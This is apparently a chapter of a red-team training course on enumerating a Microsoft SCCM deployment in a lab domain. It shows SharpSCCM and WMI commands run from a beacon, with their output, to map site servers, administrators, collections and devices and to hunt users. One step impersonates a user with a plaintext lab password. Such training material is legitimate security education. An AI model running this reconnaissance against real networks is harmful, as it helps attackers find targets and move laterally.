Enumeration

The first step when attacking SCCM is to get a feel for the deployment topology, which devices are being managed, and who the administrative users are. Throughout this chapter, we'll use the SharpSCCM tool. Given a foothold on a machine, we can begin by finding the management point and site code that it is linked to. This does not require any special privileges in the domain, in SCCM or on the endpoint.

beacon> run hostname
wkstn-2

beacon> getuid
[*] You are DEV\bfarmer

beacon> execute-assembly C:\Tools\SharpSCCM\bin\Release\SharpSCCM.exe local site-info --no-banner

-----------------------------------
CurrentManagementPoint: scm-1.cyberbotic.io
Name: SMS:S01
-----------------------------------
[+] Completed execution in 00:00:00.2733939

This enumeration uses WMI under the hood, which could be done manually.

beacon> powershell Get-WmiObject -Class SMS_Authority -Namespace root\CCM | select Name, CurrentManagementPoint | fl

Name                   : SMS:S01
CurrentManagementPoint : scm-1.cyberbotic.io

We can also check the DACL on the CN=System Management container in AD for machines that have Full Control over it (as this a pre-requisite of SCCM setup in a domain).

beacon> execute-assembly C:\Tools\SharpSCCM\bin\Release\SharpSCCM.exe get site-info -d cyberbotic.io --no-banner

[!] Found 1 computer account(s) with GenericAll permission on the System Management container:

      CYBER\SCM-1$

[+] These systems are likely to be ConfigMgr site servers
[+] Completed execution in 00:00:00.4974129

Enumerating users, groups, computers, collections, and administrators, etc, does require some level of privilege in SCCM and cannot be done as a standard domain user. SCCM employs an RBAC security model - the lowest role is "Read-Only Analyst" and the highest is "Full Administrator". Lots of other roles exist such as "Asset Manager", "Infrastructure Administrator", and "Software Update Manager". A description of each can be found here. Furthermore, the "scope" of these roles can be restricted to individual collections as needed by the administrative user. For example, computers from the DEV and CYBER domains have been grouped into their own collections.

This can really impact your view (as an attacker) of how SCCM is configured. For example, if we enumerate all the collections as bfarmer, we can see that both DEV and CYBER exist as well as their member counts.

beacon> getuid
[*] You are DEV\bfarmer

beacon> execute-assembly C:\Tools\SharpSCCM\bin\Release\SharpSCCM.exe get collections --no-banner

-----------------------------------
Name: DEV
MemberCount: 6
-----------------------------------
Name: CYBER
MemberCount: 4
-----------------------------------
[+] Completed execution in 00:00:00.6623964

However, if we run the same enumeration as jking, a member of DEV\Support Engineers, we only see the DEV collection.

beacon> make_token DEV\jking Qwerty123
[+] Impersonated DEV\jking (netonly)

beacon> execute-assembly C:\Tools\SharpSCCM\bin\Release\SharpSCCM.exe get collections --no-banner

-----------------------------------
Name: DEV
MemberCount: 6
-----------------------------------
[+] Completed execution in 00:00:02.7849452

This is because even though DEV\Developers are only "Read-Only Analysts", the role is scoped to both collections. DEV\Support Engineers are "Full Administrators" over the DEV collection but they have no roles that are scoped to the CYBER collection.

So when enumerating SCCM, you may only see a small slither based on the user you're running the enumeration as.

Administrative users can be found using get class-instances SMS_Admin.

beacon> execute-assembly C:\Tools\SharpSCCM\bin\Release\SharpSCCM.exe get class-instances SMS_Admin --no-banner

-----------------------------------
CategoryNames: All
CollectionNames: All Systems, All Users and User Groups
LogonName: SCM-1\Administrator
RoleNames: Full Administrator
-----------------------------------
CategoryNames: Default
CollectionNames: DEV, CYBER
LogonName: DEV\Developers
RoleNames: Read-only Analyst
-----------------------------------
CategoryNames: Default
CollectionNames: DEV
LogonName: DEV\Support Engineers
RoleNames: Full Administrator
-----------------------------------
CategoryNames: All
CollectionNames: All Systems, All Users and User Groups
LogonName: CYBER\Domain Admins
RoleNames: Full Administrator
-----------------------------------
[+] Completed execution in 00:00:06.0664364

This allows us to see what is reflected in the Configuration Manger GUI above. Members of these collections can be found using get collection-members -n <collection-name>.

beacon> execute-assembly C:\Tools\SharpSCCM\bin\Release\SharpSCCM.exe get collection-members -n DEV --no-banner

-----------------------------------
Domain: DEV
Name: WKSTN-2
-----------------------------------
Domain: DEV
Name: SQL-2
-----------------------------------
Domain: DEV
Name: WKSTN-1
-----------------------------------
Domain: DEV
Name: DC-2
-----------------------------------
Domain: DEV
Name: FS
-----------------------------------
Domain: DEV
Name: WEB
-----------------------------------
[+] Completed execution in 00:00:03.2562318

Even more information on each device can be obtained using get devices. There are some good ways to filter the output, such as searching by device name, -n, and only displaying the properties specified by -p.

beacon> execute-assembly C:\Tools\SharpSCCM\bin\Release\SharpSCCM.exe get devices -n WKSTN -p Name -p FullDomainName -p IPAddresses -p LastLogonUserName -p OperatingSystemNameandVersion --no-banner

-----------------------------------
FullDomainName: DEV.CYBERBOTIC.IO
IPAddresses: 10.10.123.101
LastLogonUserName: nlamb
Name: WKSTN-1
OperatingSystemNameandVersion: Microsoft Windows NT Workstation 10.0
-----------------------------------
FullDomainName: DEV.CYBERBOTIC.IO
IPAddresses: 10.10.123.102
LastLogonUserName: bfarmer
Name: WKSTN-2
OperatingSystemNameandVersion: Microsoft Windows NT Workstation 10.0
-----------------------------------
[+] Completed execution in 00:00:01.3059878

You can also use SCCM as a form of user hunting, since it records the last user to login to each managed computer. The -u parameter will only return devices where the given user was the last to login.

beacon> execute-assembly C:\Tools\SharpSCCM\bin\Release\SharpSCCM.exe get devices -u nlamb -p IPAddresses -p IPSubnets -p Name --no-banner

-----------------------------------
IPAddresses: 10.10.123.101
IPSubnets: 10.10.122.0
Name: WKSTN-1
-----------------------------------
[+] Completed execution in 00:00:01.7570393

However, take these results with a grain of salt because this information is only updated in SCCM every 7 days by default.

PreviousConfiguration ManagerNextNetwork Access Account Credentials

Last updated